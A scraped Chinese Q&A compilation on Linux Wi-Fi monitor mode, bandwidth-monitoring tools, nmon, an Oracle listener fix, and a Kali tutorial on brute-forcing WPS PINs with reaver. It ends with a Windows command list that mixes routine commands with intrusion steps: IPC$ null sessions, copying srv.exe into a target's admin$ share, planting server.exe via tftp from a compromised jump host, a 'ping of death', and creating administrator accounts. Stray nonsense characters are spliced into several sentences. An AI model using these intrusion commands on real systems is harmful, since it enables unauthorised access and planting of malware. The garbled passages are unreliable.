linux監聽模式

『壹』 linux如何列出網卡支持的wifi信道

輸入即可查看當前信道x0dx0asudo iwlist wlan0 channelx0dx0ax0dx0a無線網卡開啟監聽模式x0dx0a首先輸入x0dx0aiwconfigx0dx0ax0dx0a查看無線網卡狀態, 大致可以看到以下情況x0dx0aeth0 no wireless extensions.x0dx0ax0dx0alo no wireless extensions.x0dx0awlan0 IEEE 802.11bgn ESSID:"ZJUWLAN"x0dx0aMode:Managed Frequency:2.412 GHz Access Point: 80:F6:2E:14:E6:30x0dx0aBit Rate=65 Mb/s Tx-Power=16 dBmx0dx0aRetry long limit:7 RTS thr:off Fragment thr:off Power Management:off Link Quality=37/70 Signal level=-73 dBmx0dx0aRx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:70 Missed beacon:0x0dx0a可以看到wlan0的第二行Mode為Managed, 想要開啟監聽模式就是要改變這個值. 首先進入root用仔段戶模式蔽戚舉x0dx0asudo -iiwconfig wlan0 mode monitorx0dx0ax0dx0a要注意到想要改變監聽模式, 必須將相應網卡暫時停用. 如果是wlan0的話關閉wifi即可.x0dx0a然後再次輸入iwconfig即可看到mode已經成功變為了monitor:x0dx0aeth0 no wireless extensions.lo no wireless extensions.wlan0 IEEE 802.11bgn Mode:Monitor Tx-Power=off Retry long limit:7 RTS thr:off Fragment thr:off Power Management:offx0dx0ax0dx0a如果想要切換當前監聽信道, 即可執行以下語句:x0dx0aiwconfig wlan0 channel 11x0dx0ax0dx0a再次執行以下宏碧命令即可查看當前信道x0dx0aiwlist wlan0 channelx0dx0ax0dx0a但是發現在wifi重新開啟後mode又回到了managed, 一番查詢後發現還是安裝aircrack-ng比較方便x0dx0a於是執行以下命令安裝aircrack-ngx0dx0asudo apt-get install aircrack-ngx0dx0ax0dx0a然後再執行以下命令開啟wlan0的監聽模式x0dx0aairmon-ng start wlan0

『貳』 如何監控LINUX網路狀態

下面是按功能劃分的命令名稱。
監控總體帶寬使用――nload、bmon、slurm、bwm-ng、cbm、speedometer和netload
監控總體帶寬使用（批量式輸出）――vnstat、ifstat、dstat和collectl
每個套接字連接的帶寬使用――iftop、iptraf、tcptrack、pktstat、netwatch和trafshow
每個進程的帶寬使用――nethogs
1. nload

nload是一個命令行工具，讓用戶可以分開來監控入站流量和出站流量。它還可以繪制圖表以顯示入站流量和出站流量，視圖比例可以調整。用起來很簡單，不支持許多選項。
所以，如果你只需要快速查看總帶寬使用情況，無需每個進程的詳細情況，那麼nload用起來很方便。
$ nload

安裝nload：Fedora和Ubuntu在默認軟體庫裡面就有nload。CentOS用戶則需要從Epel軟體庫獲得nload。
# fedora或centos $ yum install nload -y # ubuntu/debian $ sudo apt-get install nload

2. iftop
iftop可測量通過每一個套接字連接傳輸的數據；它採用的工作方式有別於nload。iftop使用pcap庫來捕獲進出網路適配器的數據包，然後匯總數據包大小和數量，搞清楚總的帶寬使用情況。
雖然iftop報告每個連接所使用的帶寬，但它無法報告參與某個套按字連接的進程名稱/編號（ID）。不過由於基於pcap庫，iftop能夠過濾流量，並報告由過濾器指定的所選定主機連接的帶寬使用情況。
$ sudo iftop -n

n選項可以防止iftop將IP地址解析成主機名，解析本身就會帶來額外的網路流量。

安裝iftop：Ubuntu/Debian/Fedora用戶可以從默認軟體庫獲得它。CentOS用戶可以從Epel獲得它。
# fedora或centos yum install iftop -y # ubuntu或 debian $ sudo apt-get install iftop

3. iptraf
iptraf是一款互動式、色彩鮮艷的IP區域網監控工具。它可以顯示每個連接以及主機之間傳輸的數據量。下面是屏幕截圖。

$ sudo iptraf

安裝iptraf：
# Centos（基本軟體庫） $ yum install iptraf # fedora或centos（帶epel） $ yum install iptraf-ng -y # ubuntu或debian $ sudo apt-get install iptraf iptraf-ng

4. nethogs
nethogs是一款小巧的"net top"工具，可以顯示每個進程所使用的帶寬，並對列表排序，將耗用帶寬最多的進程排在最上面。萬一出現帶寬使用突然激增的情況，用戶迅速打開nethogs，就可以找到導致帶寬使用激增的進程。nethogs可以報告程序的進程編號（PID）、用戶和路徑。
$ sudo nethogs

安裝nethogs：Ubuntu、Debian和Fedora用戶可以從默認軟體庫獲得。CentOS用戶則需要Epel。
# ubuntu或debian（默認軟體庫） $ sudo apt-get install nethogs # fedora或centos（來自epel） $ sudo yum install nethogs -y

5. bmon
bmon（帶寬監控器）是一款類似nload的工具，它可以顯示系統上所有網路介面的流量負載。輸出結果還含有圖表和剖面，附有數據包層面的詳細信息。

安裝bmon：Ubuntu、Debian和Fedora用戶可以從默認軟體庫來安裝。CentOS用戶則需要安裝repoforge，因為Epel裡面沒有bmon。
# ubuntu或debian $ sudo apt-get install bmon # fedora或centos（來自repoforge） $ sudo yum install bmon

bmon支持許多選項，能夠製作HTML格式的報告。欲知更多信息，請參閱參考手冊頁。
6. slurm
slurm是另一款網路負載監控器，可以顯示設備的統計信息，還能顯示ASCII圖形。它支持三種不同類型的圖形，使用c鍵、s鍵和l鍵即可激活每種圖形。slurm功能簡單，無法顯示關於網路負載的任何更進一步的詳細信息。
$ slurm -s -i eth0

安裝slurm
# debian或ubuntu $ sudo apt-get install slurm # fedora或centos $ sudo yum install slurm -y

7. tcptrack
tcptrack類似iftop，使用pcap庫來捕獲數據包，並計算各種統計信息，比如每個連接所使用的帶寬。它還支持標準的pcap過濾器，這些過濾器可用來監控特定的連接。

安裝tcptrack：Ubuntu、Debian和Fedora在默認軟體庫裡面就有它。CentOS用戶則需要從RepoForge獲得它，因為Epel裡面沒有它。
# ubuntu, debian $ sudo apt-get install tcptrack # fedora, centos（來自repoforge軟體庫） $ sudo yum install tcptrack

8. vnstat
vnstat與另外大多數工具有點不一樣。它實際上運行後台服務/守護進程，始終不停地記錄所傳輸數據的大小。之外，它可以用來製作顯示網路使用歷史情況的報告。
$ service vnstat status * vnStat daemon is running

運行沒有任何選項的vnstat，只會顯示自守護進程運行以來所傳輸的數據總量。
$ vnstat Database updated: Mon Mar 17 15:26:59 2014 eth0 since 06/12/13 rx: 135.14 GiB tx: 35.76 GiB total: 170.90 GiB monthly rx | tx | total | avg. rate ------------------------+-------------+-------------+------------- Feb '14 8.19 GiB | 2.08 GiB | 10.27 GiB | 35.60 kbit/s Mar '14 4.98 GiB | 1.52 GiB | 6.50 GiB | 37.93 kbit/s ------------------------+-------------+-------------+------------- estimated 9.28 GiB | 2.83 GiB | 12.11 GiB | daily rx | tx | total | avg. rate ------------------------+-------------+-------------+------------- yesterday 236.11 MiB | 98.61 MiB | 334.72 MiB | 31.74 kbit/s today 128.55 MiB | 41.00 MiB | 169.56 MiB | 24.97 kbit/s ------------------------+-------------+-------------+------------- estimated 199 MiB | 63 MiB | 262 MiB |

想實時監控帶寬使用情況，請使用"-l"選項（實時模式）。然後，它會顯示入站數據和出站數據所使用的總帶寬量，但非常精確地顯示，沒有關於主機連接或進程的任何內部詳細信息。
$ vnstat -l -i eth0 Monitoring eth0... (press CTRL-C to stop) rx: 12 kbit/s 10 p/s tx: 12 kbit/s 11 p/s

vnstat更像是一款製作歷史報告的工具，顯示每天或過去一個月使用了多少帶寬。它並不是嚴格意義上的實時監控網路的工具。
vnstat支持許多選項，支持哪些選項方面的詳細信息請參閱參考手冊頁。
安裝vnstat
# ubuntu或debian $ sudo apt-get install vnstat # fedora或 centos（來自epel） $ sudo yum install vnstat

9. bwm-ng
bwm-ng（下一代帶寬監控器）是另一款非常簡單的實時網路負載監控工具，可以報告摘要信息，顯示進出系統上所有可用網路介面的不同數據的傳輸速度。
$ bwm-ng bwm-ng v0.6 (probing every 0.500s), press 'h' for help input: /proc/net/dev type: rate / iface Rx Tx T ot================================================================= == eth0: 0.53 KB/s 1.31 KB/s 1.84 KB lo: 0.00 KB/s 0.00 KB/s 0.00 KB------------------------------------------------------------------------------------------------------------- total: 0.53 KB/s 1.31 KB/s 1.84 KB/s

如果控制台足夠大，bwm-ng還能使用curses2輸出模式，為流量繪制條形圖。
$ bwm-ng -o curses2

安裝bwm-ng：在CentOS上，可以從Epel來安裝bwm-ng。
# ubuntu或debian $ sudo apt-get install bwm-ng # fedora或centos（來自epel） $ sudo apt-get install bwm-ng

10. cbm：Color Bandwidth Meter

這是一款小巧簡單的帶寬監控工具，可以顯示通過諸網路介面的流量大小。沒有進一步的選項，僅僅實時顯示和更新流量的統計信息。
$ sudo apt-get install cbm

11. speedometer
這是另一款小巧而簡單的工具，僅僅繪制外觀漂亮的圖形，顯示通過某個介面傳輸的入站流量和出站流量。
$ speedometer -r eth0 -t eth0

安裝speedometer
# ubuntu或debian用戶 $ sudo apt-get install speedometer

12. pktstat

pktstat可以實時顯示所有活動連接，並顯示哪些數據通過這些活動連接傳輸的速度。它還可以顯示連接類型，比如TCP連接或UDP連接；如果涉及HTTP連接，還會顯示關於HTTP請求的詳細信息。
$ sudo pktstat -i eth0 -nt $ sudo apt-get install pktstat

13. netwatch

netwatch是netdiag工具庫的一部分，它也可以顯示本地主機與其他遠程主機之間的連接，並顯示哪些數據在每個連接上所傳輸的速度。
$ sudo netwatch -e eth0 -nt $ sudo apt-get install netdiag

14. trafshow
與netwatch和pktstat一樣，trafshow也可以報告當前活動連接、它們使用的協議以及每條連接上的數據傳輸速度。它能使用pcap類型過濾器，對連接進行過濾。
只監控TCP連接

$ sudo trafshow -i eth0 tcp $ sudo apt-get install netdiag

15. netload
netload命令只顯示關於當前流量負載的一份簡短報告，並顯示自程序啟動以來所傳輸的總位元組量。沒有更多的功能特性。它是netdiag的一部分。

$ netload eth0 $ sudo apt-get install netdiag

16. ifstat
ifstat能夠以批處理式模式顯示網路帶寬。輸出採用的一種格式便於用戶使用其他程序或實用工具來記入日誌和分析。
$ ifstat -t -i eth0 0.5 Time eth0 HH:MM:SS KB/s in KB/s out 09:59:21 2.62 2.80 09:59:22 2.10 1.78 09:59:22 2.67 1.84 09:59:23 2.06 1.98 09:59:23 1.73 1.79

安裝ifstat：Ubuntu、Debian和Fedora用戶在默認軟體庫裡面就有它。CentOS用戶則需要從Repoforge獲得它，因為Epel裡面沒有它。
# ubuntu, debian $ sudo apt-get install ifstat # fedora, centos（Repoforge） $ sudo yum install ifstat

17. dstat
dstat是一款用途廣泛的工具（用python語言編寫），它可以監控系統的不同統計信息，並使用批處理模式來報告，或者將相關數據記入到CSV或類似的文件。這個例子顯示了如何使用dstat來報告網路帶寬。
安裝dstat
$ dstat -nt -net/total- ----system---- recv send| time 0 0 |23-03 10:27:13 1738B 1810B|23-03 10:27:14 2937B 2610B|23-03 10:27:15 2319B 2232B|23-03 10:27:16 2738B 2508B|23-03 10:27:17

18. collectl
collectl以一種類似dstat的格式報告系統的統計信息；與dstat一樣，它也收集關於系統不同資源（如處理器、內存和網路等）的統計信息。這里給出的一個簡單例子顯示了如何使用collectl來報告網路使用/帶寬。
$ collectl -sn -oT -i0.5 waiting for 0.5 second sample... # <----------Network----------> #Time KBIn PktIn KBOut PktOut 10:32:01 40 58 43 66 10:32:01 27 58 3 32 10:32:02 3 28 9 44 10:32:02 5 42 96 96 10:32:03 5 48 3 28

安裝collectl
# Ubuntu/Debian用戶 $ sudo apt-get install collectl #Fedora $ sudo yum install collectl

『叄』 如何使用Nmon監控Linux系統性能

用Nmon監控Linux系統性能的方法請參見下面介紹（配圖）：
1、安裝Nmon
2、一旦安裝完成，則可以通過在終端執行 nmon 命令啟動它。
Nmon命令執行之後，大家可以看到如下輸出：

3、從上圖中大家可以看到，Nmon 命令行工具是一個用戶交互的應用程序，大家可以非常方便地使用鍵盤快捷鍵來查看相關統計信息。
q : 停止並退出Nmon
h : 查看幫助信息
c : 查看 CPU 統計信息
m : 查看內存統計信息
d : 查看磁碟統計信息
k : 查看內核統計信息
n : 查看網路統計信息
N : 查看 NFS 統計信息
j : 查看文件系統統計信息
t : 查看 Top 進程統計信息
V : 查看虛擬內存統計信息
v : 詳細輸出模式
4、查看 CPU 統計信息
如果你想查看 CPU 性能信息，可以直接按 c 鍵：

5、查看 Top 進程統計信息
如果你想查看 Top 進程統計信息，可以直接按 t 鍵：

6、查看網路統計信息
如果你想查看網路統計信息，可以直接按 n 鍵：

7、磁碟I/O圖
使用 d 鍵可以查看磁碟統計信息：

8、查看內核統計信息
如果你想查看內核統計信息，可以直接按 k 鍵：

9、獲取系統信息
如果要查看 Linux 的系統信息，如：系統架構、操作系統版本、Linux 版本則可以使用 r 鍵，這對系統管理員非常有用。

以上是基礎使用方法。下面再補充一些命令和方法：塌或

1、啟動
打開nmon所在的目錄：cd /usr/local/nmon修改啟動文件的訪問許可權：chmod 755 nmon_x86_rhel52啟動nmon：./nmon_x86_rhel52如果要采樣nmon的數據保存成文件，可以./nmon_x86_rhel52 -fT -s 30 -c 120其中30表示每隔30秒nmon取一次系統性能數據，120表示取120次；這樣nmon將會在運行開始算起連續取得30sX120=60分鍾，可根據實際需要時間調整；當運行以上命令後該目錄下會生成一個.nmon文件，該文件會根據間隔時間被寫入性能數據，當一段時間後再查看該文件，文件位元組變大
利用nmonanalyser分析.nmon文件
當測試結束的同時ftp到伺服器上將.nmon文件get下來，打開nmon_analyser.zip 包下的nmon analyser v338.xls 文件，點擊Analyse nomn data按鈕，選擇之前get來下的.nmon文件。（如果報告以下宏的安全級別太高錯誤，則在「工具 -- 宏 --安全性」里把級別調低，然後重新打開 nmon analyser v338.xls 文件）待分析結束後會生成性能分析結果文件（文件格式為.xls，沖衫鍵其中包括CPU,IO,內存等性能分析報告）。分析結果中有很多數據和圖形，簡要介紹主要的性能參數圖像
4.1 系統匯總（對應excel標簽的『SYS_SUMM』）藍線為cpu佔有率變化情況；粉線為磁碟IO的變化情況；
4.2磁碟讀寫情況匯總（對應excel標簽的『DISK_SUMM』）藍色為磁碟讀的速率KB/sec紫色為磁碟寫的速率KB/sec
4.3內存情況匯總（對應excel標簽的『MEM』）曲線表示內存剩餘量（MB）分析數據得到的報告文件（.xls）中包含很多性能分析結果數據，根據自己的需要查看。
2、nmon運行本身就消耗系統資源的；另外如果取到.nmon文件後確定不再需要nmon繼續收集信息則應kill掉nmon；命令：
ps -A | grep nmon #得到pid
kill -9 pid
suse10 enterprise sp2:
nmon_x86_rhel3
使用對應的操作系統文件：chmod +x nmon_x86_ubuntu810mv nmon_x86_ubuntu810 /usr/local/bin/nmon
對於 Debian 還要做以下操作（不做也同樣能運行）：apt-get install lsb-releaselsb_release -d | sed 's/Description:\t//' > /etc/debian_release
然後直接運行 nmon 即可。
採集數據並生成報表：採集數據:nmon -s10 -c60 -f -m /home/
參數解釋散巧：-s10 每 10 秒採集一次數據。-c60 採集 60 次，即為採集十分鍾的數據。-f 生成的數據文件名中包含文件創建的時間。-m 生成的數據文件的存放目錄。
這樣就會生成一個 nmon 文件，並每十秒更新一次，直到十分鍾後。生成的文件名如： hostname_090824_1306.nmon ，"hostname" 是這台主機的主機名。

『肆』 怎樣停止kalilinux網卡的監聽模式

airmon-ng start wlan0 打開監聽

arimon-ng stop wlan0 關閉監聽

『伍』 Kali從入門到銀手鐲（二）：開啟WPS的無線網路滲透測試

很多無線路由器都支持WPS（Wifi Protection Setup）功能，它是一種可以讓用戶無需密碼直接連接Wifi的技術。本來這種技術的初衷是讓用戶更加方便的連接網路，但是因為它有嚴重的安全漏洞，所以反而讓用戶的網路更加不安全。因此在這里推薦大家使用路由器的時候沒事就把WPS功能關掉。

因為要進行滲透測試，所以首先我先把自己路由器的WPS功能開啟，當然測試結束之後別忘了關閉WPS功能。

使用前一篇文章介紹的方法安裝好Kali虛擬機或者U盤系統，然後就可以准備開始了。

當然這里使用到的工具並不是只有Kali能用，其他Linux發行版也可以使用。但是還是推薦Kali，因為很多滲透測試工具都是按照安防論文的理論來實現的，很多都已經不再維護了。而Kali收集了很多尚在維護的工具分支，如果你使用其他發行版的話，可能其軟體倉庫中的版本還是原來的舊版本。

本文比較簡單，涉及到的工具有兩個，reaver和aircrack-ng。

我用的是台式機安裝的Kali虛擬機系統，自然是沒有無線功能的，所以需要一塊無線網卡。值得稱道的是現在Linux驅動非常完善了，我原來買的360無線網卡可以直接驅動成功。

連接方法也十分簡單，電腦插上無線網卡，然後在VMware軟體右下角找到無線網卡的圖標，點擊並選擇連接到虛擬機，這樣就大功告成了。整個系統可能會卡幾秒鍾，之後就正常了。

連接成功後，在Kali虛擬機中應該可以看到Wifi圖標了，用lsusb命令還可以查看到無線網卡的廠商和具體型號，可以看到我的無線網卡具體型號是MT7601U。

首先輸入 sudo airmon-ng 命令查看一下當前系統中的無線網卡，在Kali中這個介面名默認應該是wlan0。

然後輸入下面的命令關閉可能影響網卡監聽的程序，然後開啟監聽模式。開啟完畢之後，再次輸入 sudo airmon-ng ，應該就會看到這次介面名變成了wlan0mon，這樣就說迅悶首明成功開啟了監聽模式，可以進行下一步了。

輸入下面的命令開始掃描附近的無線網路。

稍後應該就會顯示出附近開啟了WPS的所有網路了，dBm是信號大小，值越小說明信號越強，按Ctrl+C即可中斷命令。如果想要查看所有網路的話，可以添加 -a 參數，它會列出所有網路（包括了未開啟WPS功能的網路）。

這時候就要記下來網路的BSSID(網路Mac地址)以及ESSID(網路名稱)，准備好下一步的工罩賣作了。

好了，下面就可以開始正式的工作了，其實說起來原理也很簡單，WPS PIN是一個8位數字密碼，所以其實我們要做的就是不斷的嘗試，最終找到這個PIN。總共需要嘗試的次數有一億次，看起來這個數字非常大，但是在安全領域，一億次算是一個非常小的次數了，很多加密演算法要攻破甚至需要全世界所有計算機同時計算幾百畝數年。

當然要搞定WPS的PIN並不需要這么長時間，最多10來個小時就可以了，平均用時可能也就4-5個小時左右。而且一旦知道了PIN，獲得WIFI密碼僅需要數秒即可搞定。之後只要PIN碼沒有發生變化，就算WIFI密碼被修改，也可以很輕松的搞定。

接下來就要輪到本文的主角登場了，這就是reaver，專門用於破解WPS Wifi網路的工具。輸入 -h 參數即可查看幫助信息，這里簡單列出一些我們要使用的參數。

詳細參數參考reaver的幫助，並不難懂。

了解了reaver命令行的用法之後，就可以正式開始了。很多時候一次可能並不能成功，需要嘗試多次。

因為是測試，所以我乾脆直接指定了PIN的值。為了更詳細的了解命令運行過程，可以開啟2級或者3級輸出看看reaver工具到底幹了啥。

如果出現了下面的bad FCS，可以在添加 -F 參數忽略幀校驗錯誤，然後再次嘗試。

如果一切正常的話，應該會在幾分鍾內通過PIN解開WIFI的密碼。如果不知道PIN密碼的話，也可以通過幾個小時的嘗試來試出PIN進而得知WIFI密碼。因此我們在日常使用的時候，一定要記得關掉WPS功能，它是很多漏洞的根源。

『陸』 Linux下Oracle監聽服務啟動失敗，高人進來幫忙解決一下～

錯誤提示是沒有許可權，網上搜了下看到：
The Unix permissions for the hidden directory /tmp/.oracle should be:
Owner = the Oracle user who performed the database install,
Group = the dba group of the Oracle user,
and the directory's Unix permissions should be drwxrwxrwx

試試：
1) 進入/tmp目錄
# cd /var/tmp（on Solaris Linux）
或者
# cd /tmp（on Hp and IBM）
2) 修改許可權
# chown -R oracle10:dba .oracle
或者
# chmod 777 .oracle

『柒』 開始-運行可以運行哪些命令，寫全

net use \\ip\ipc$ " " /user:" " 建立IPC空鏈接
net use \\ip\ipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接
net use h: \\ip\c$ "密碼" /user:"用戶名" 直接登陸後映射對方C：到本地為H:
net use h: \\ip\c$ 登陸後映射對方C：到本地為H:
net use \\ip\ipc$ /del 刪除IPC鏈接
net use h: /del 刪除映射對方到本地的為H:的映射
net user 用戶名 密碼 /add 建立用戶
net user guest /active:yes 激活guest用戶
net user 查看有哪些用戶
net user 帳戶名 查看帳戶的屬性
net localgroup administrators 用戶名 /add 把「用戶」添加到管理員中使其具有管理員許可權,注意：administrator後加s用復數
net start 查看開啟了哪些服務
net start 服務名 開啟服務；(如:net start telnet， net start schele)
net stop 服務名 停止某服務
net time \\目標ip 查看對方時間
net time \\目標ip /set 設置本地計算機時間與「目標IP」主機的時間同步,加上參數/yes可取消確認信息
net view 查看本地區域網內開啟了哪些共享
net view \\ip 查看對方區域網內開啟了哪些共享
net config 顯示系統網路設置
net logoff 斷開連接的共享
net pause 服務名 暫停某服務
net send ip "文本信息" 向對方發信息
net ver 區域網內正在使用的網路連接類型和信息
net share 查看本地開啟的共享
net share ipc$ 開啟ipc$共享
net share ipc$ /del 刪除ipc$共享
net share c$ /del 刪除C：共享
net user guest 12345 用guest用戶登陸後用將密碼改為12345
net password 密碼 更改系統登陸密碼
netstat -a 查看開啟了哪些埠,常用netstat -an
netstat -n 查看埠的網路連接情況，常用netstat -an
netstat -v 查看正在進行的工作
netstat -p 協議名 例：netstat -p tcq/ip 查看某協議使用情況（查看tcp/ip協議使用情況）
netstat -s 查看正在使用的所有協議使用情況
nbtstat -A ip 對方136到139其中一個埠開了的話，就可查看對方最近登陸的用戶名（03前的為用戶名）-注意：參數-A要大寫
tracert -參數 ip(或計算機名) 跟蹤路由（數據包），參數：「-w數字」用於設置超時間隔。
ping ip(或域名) 向對方主機發送默認大小為32位元組的數據，參數：「-l[空格]數據包大小」；「-n發送數據次數」；「-t」指一直ping。
ping -t -l 65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用參數「/all」顯示全部配置信息
tlist -t 以樹行列表顯示進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
kill -F 進程名 加-F參數後強制結束某進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
del -F 文件名 加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件，/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如「DEL/AR *.*」表示刪除當前目錄下所有隻讀文件，「DEL/A-S *.*」表示刪除當前目錄下除系統文件以外的所有文件

#2 二：

del /S /Q 目錄 或用：rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q 可取消刪除操作時的系統確認就直接刪除。（二個命令作用相同）
move 盤符\路徑\要移動的文件名 存放移動文件的路徑\移動後文件名 移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋
fc one.txt two.txt > 3st.txt 對比二個文件並把不同之處輸出到3st.txt文件中，"> "和"> >" 是重定向命令
at id號 開啟已注冊的某個計劃任務
at /delete 停止所有計劃任務，用參數/yes則不需要確認就直接停止
at id號 /delete 停止某個已注冊的計劃任務
at 查看所有的計劃任務
at \\ip time 程序名(或一個命令) /r 在某時間運行對方某程序並重新啟動計算機
finger username @host 查看最近有哪些用戶登陸
telnet ip 埠 遠和登陸伺服器,默認埠為23
open ip 連接到IP（屬telnet登陸後的命令）
telnet 在本機上直接鍵入telnet 將進入本機的telnet
路徑\文件名1 路徑\文件名2 /y 復制文件1到指定的目錄為文件2，用參數/y就同時取消確認你要改寫一份現存目錄文件
c:\srv.exe \\ip\admin$ 復制本地c:\srv.exe到對方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件，註：2st.txt文件頭要空三排，參數：/b指二進制文件，/a指ASCLL格式文件
\\ip\admin$\svv.exe c:\ 或:\\ip\admin$\*.* 復制對方admini$共享下的srv.exe文件（所有文件）至本地C：
x 要復制的文件或目錄樹 目標地址\目錄名 復制文件和目錄樹，用參數/Y將不提示覆蓋相同文件
tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe c:\server.exe 登陸後，將「IP」的server.exe下載到目標主機c:\server.exe 參數：-i指以二進制模式傳送，如傳送exe文件時用，如不加-i 則以ASCII模式（傳送文本文件模式）進行傳送
tftp -i 對方IP put c:\server.exe 登陸後，上傳本地c:\server.exe至主機
ftp ip 埠 用於上傳文件至伺服器或進行文件操作，默認埠為21。bin指用二進制方式傳送（可執行文件進）；默認為ASCII格式傳送(文本文件時)
route print 顯示出IP路由，將主要顯示網路地址Network addres，子網掩碼Netmask，網關地址Gateway addres，介面地址Interface
arp 查看和處理ARP緩存，ARP是名字解析的意思，負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出全部信息
start 程序名或命令 /max 或/min 新開一個新窗口並最大化（最小化）運行某程序或命令
mem 查看cpu使用情況
attrib 文件名(目錄名) 查看某文件（目錄）的屬性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存檔，只讀，系統，隱藏 屬性；用＋則是添加為某屬性
dir 查看文件，參數：/Q顯示文件及目錄屬系統哪個用戶，/T:C顯示文件創建時間，/T:A顯示文件上次被訪問時間，/T:W上次被修改時間
date /t 、 time /t 使用此參數即「DATE/T」、「TIME/T」將只顯示當前日期和時間，而不必輸入新日期和時間
set 指定環境變數名稱=要指派給變數的字元 設置環境變數
set 顯示當前所有的環境變數
set p(或其它字元) 顯示出當前以字元p(或其它字元)開頭的所有環境變數
pause 暫停批處理程序，並顯示出：請按任意鍵繼續....
if 在批處理程序中執行條件處理（更多說明見if命令及變數）
goto 標簽 將cmd.exe導向到批處理程序中帶標簽的行（標簽必須單獨一行，且以冒號打頭，例如：「：start」標簽）
call 路徑\批處理文件名 從批處理程序中調用另一個批處理程序 （更多說明見call /?）
for 對一組文件中的每一個文件執行某個特定命令（更多說明見for命令及變數）
echo on或off 打開或關閉echo，僅用echo不加參數則顯示當前echo設置
echo 信息 在屏幕上顯示出信息
echo 信息 >> pass.txt 將"信息"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中尋找字元串hello
find 文件名 查找某文件
title 標題名字 更改CMD窗口標題名字
color 顏色值 設置cmd控制台前景和背景顏色；0＝黑、1＝藍、2＝綠、3＝淺綠、4＝紅、5＝紫、6＝黃、7=白、8=灰、9=淡藍、A＝淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白
prompt 名稱 更改cmd.exe的顯示的命令提示符(把C:\、D:\統一改為：EntSky\ )

#3 三：

ver 在DOS窗口下顯示版本信息
winver 彈出一個窗口顯示版本信息（內存大小、系統版本、補丁版本、計算機名）
format 盤符 /FS:類型 格式化磁碟,類型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS
md 目錄名 創建目錄
replace 源文件 要替換文件的目錄 替換文件
ren 原文件名 新文件名 重命名文件名
tree 以樹形結構顯示出目錄，用參數-f 將列出第個文件夾中文件名稱
type 文件名 顯示文本文件的內容
more 文件名 逐屏顯示輸出文件
doskey 要鎖定的命令＝字元
doskey 要解鎖命令= 為DOS提供的鎖定命令(編輯命令行，重新調用win2k命令，並創建宏)。如：鎖定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解鎖：doskey dir=
taskmgr 調出任務管理器
chkdsk /F D: 檢查磁碟D並顯示狀態報告；加參數/f並修復磁碟上的錯誤
tlntadmn telnt服務admn,鍵入tlntadmn選擇3，再選擇8,就可以更改telnet服務默認埠23為其它任何埠
exit 退出cmd.exe程序或目前，用參數/B則是退出當前批處理腳本而不是cmd.exe
path 路徑\可執行文件的文件名 為可執行文件設置一個路徑。
cmd 啟動一個win2K命令解釋窗口。參數：/eff、/en 關閉、開啟命令擴展；更我詳細說明見cmd /?
regedit /s 注冊表文件名 導入注冊表；參數/S指安靜模式導入，無任何提示；
regedit /e 注冊表文件名 導出注冊表
cacls 文件名 參數 顯示或修改文件訪問控制列表（ACL）——針對NTFS格式時。參數：/D 用戶名:設定拒絕某用戶訪問；/P 用戶名:perm 替換指定用戶的訪問許可權；/G 用戶名:perm 賦予指定用戶訪問許可權；Perm 可以是: N 無，R 讀取， W 寫入， C 更改(寫入)，F 完全控制；例：cacls D:\test.txt /D pub 設定d:\test.txt拒絕pub用戶訪問。
cacls 文件名 查看文件的訪問用戶許可權列表
REM 文本內容 在批處理文件中添加註解
netsh 查看或更改本地網路配置情況

#4 四：

IIS服務命令：
iisreset /reboot 重啟win2k計算機（但有提示系統將重啟信息出現）
iisreset /start或stop 啟動（停止）所有Internet服務
iisreset /restart 停止然後重新啟動所有Internet服務
iisreset /status 顯示所有Internet服務狀態
iisreset /enable或disable 在本地系統上啟用（禁用）Internet服務的重新啟動
iisreset /rebootonerror 當啟動、停止或重新啟動Internet服務時，若發生錯誤將重新開機
iisreset /noforce 若無法停止Internet服務，將不會強制終止Internet服務
iisreset /timeout Val在到達逾時間（秒）時，仍未停止Internet服務，若指定/rebootonerror參數，則電腦將會重新開機。預設值為重新啟動20秒，停止60秒，重新開機0秒。
FTP 命令： (後面有詳細說明內容)
ftp的命令行格式為:
ftp －v －d －i －n －g[主機名] －v 顯示遠程伺服器的所有響應信息。
－d 使用調試方式。
－n 限制ftp的自動登錄,即不使用.netrc文件。
－g 取消全局文件名。
help [命令] 或 ？[命令] 查看命令說明
bye 或 quit 終止主機FTP進程,並退出FTP管理方式.
pwd 列出當前遠端主機目錄
put 或 send 本地文件名 [上傳到主機上的文件名] 將本地一個文件傳送至遠端主機中
get 或 recv [遠程主機文件名] [下載到本地後的文件名] 從遠端主機中傳送至本地主機中
mget [remote-files] 從遠端主機接收一批文件至本地主機
mput local-files 將本地主機中一批文件傳送至遠端主機
dir 或 ls [remote-directory] [local-file] 列出當前遠端主機目錄中的文件.如果有本地文件,就將結果寫至本地文件
ascii 設定以ASCII方式傳送文件(預設值)
bin 或 image 設定以二進制方式傳送文件
bell 每完成一次文件傳送,報警提示
cp 返回上一級目錄
close 中斷與遠程伺服器的ftp會話(與open對應)
open host[port] 建立指定ftp伺服器連接,可指定連接埠
delete 刪除遠端主機中的文件
mdelete [remote-files] 刪除一批文件
mkdir directory-name 在遠端主機中建立目錄
rename [from] [to] 改變遠端主機中的文件名
rmdir directory-name 刪除遠端主機中的目錄
status 顯示當前FTP的狀態
system 顯示遠端主機系統類型
user user-name [password] [account] 重新以別的用戶名登錄遠端主機
